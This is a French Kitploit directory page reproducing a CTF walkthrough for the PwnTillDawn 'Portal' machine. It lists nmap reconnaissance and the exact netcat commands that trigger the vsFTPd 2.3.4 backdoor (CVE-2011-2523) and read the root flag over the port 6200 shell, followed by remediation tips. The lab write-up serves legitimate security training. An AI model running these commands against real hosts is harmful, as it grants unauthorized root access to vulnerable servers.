Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PwnTillDawn-Portal-Walkthrough — Un guide détaillé de test d'intrusion et rapport d'exploitation pour la machine 'Portal', axé sur CVE-2011-2523 (Backdoor vsFTPd 2.3.4) pour obtenir un accès root. | Kitploit
Outils/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Escalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationPost-ExploitationCTFTests d'IntrusionApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

Un guide détaillé de test d'intrusion et rapport d'exploitation pour la machine 'Portal', axé sur CVE-2011-2523 (Backdoor vsFTPd 2.3.4) pour obtenir un accès root.

Voir le dépôt
il y a 5 moisPas encore vérifié

🔐 Évaluation de la vulnérabilité et tests de pénétration (VAPT)

📌 Projet : Procédure pas à pas d'exploitation de cible

⚠️ Ce projet est destiné uniquement à des fins éducatives et de tests autorisés.
L'accès non autorisé aux systèmes est strictement interdit.


👨‍💻 Auteur

SYAFIQ
Rôle : Responsable des tests de pénétration


🎯 Informations sur la cible

  • Adresse IP de la cible : 10.150.150.12
  • Système d'exploitation : Ubuntu Linux
  • Statut : 🔴 CRITIQUE (Backdoor détectée)
  • Vulnérabilité : CVE-2011-2523 (Backdoor vsFTPd)

🧭 Aperçu de l'attaque

PhaseOutilDescription
DécouverteNmapScanner le réseau pour les hôtes actifs
ÉnumérationNmapIdentifier les services et versions
AnalyseScript NSEDétecter une vulnérabilité connue
ExploitationNetcatDéclencher la backdoor
Post-exploitationTerminalObtenir un accès root et récupérer le flag

🚀 Procédure pas à pas

🔍 Étape 1 : Reconnaissance du réseau

Scanner les hôtes actifs sur le réseau :

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ Résultat :

-8 hôtes détectés -Cible identifiée : 10.150.150.12

🔎 Étape 2 : Énumération des services

Scanner les ports et services ouverts :

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ Résultats :

-Port 21 → FTP (vsftpd) -Port 22 → SSH (OpenSSH 8.2p1)

⚠️ Étape 3 : Scan de vulnérabilités

Vérifier la présence d'une vulnérabilité de backdoor FTP connue :

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 Résultat :

-La cible est VULNÉRABLE -CVE-2011-2523 confirmée

💣 Étape 4 : Exploitation

Déclencher la backdoor en utilisant un nom d'utilisateur malveillant :

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ Cela ouvre un shell root caché sur le port 6200

🔓 Étape 5 : Obtenir l'accès (shell root)

Se connecter à la backdoor et exécuter des commandes :

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ Résultat :

-Accès root obtenu -uid=0(root) confirmé

🏁 Flag capturé :

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 Points à retenir

Mettez toujours à jour les services obsolètes (vsFTPd était vulnérable) Des services mal configurés peuvent compromettre l'ensemble du système Des scans simples peuvent révéler des vulnérabilités critiques -🛡️ Recommandations -🔄 Mettez à jour le service FTP vers la dernière version -🚫 Désactivez les services inutiles -🔐 Utilisez un pare-feu pour restreindre l'accès -📊 Effectuez des audits de sécurité réguliers -📚 Avertissement

Ce projet est créé strictement pour :

  • Apprendre la cybersécurité
  • Pratiquer le hacking éthique
  • Effectuer des tests de pénétration autorisés

❌ N'utilisez PAS ces connaissances pour des activités illégales.

⭐ Note finale

« La sécurité n'est pas un produit, mais un processus. » — Testez, surveillez et améliorez constamment.

Télécharger l’outil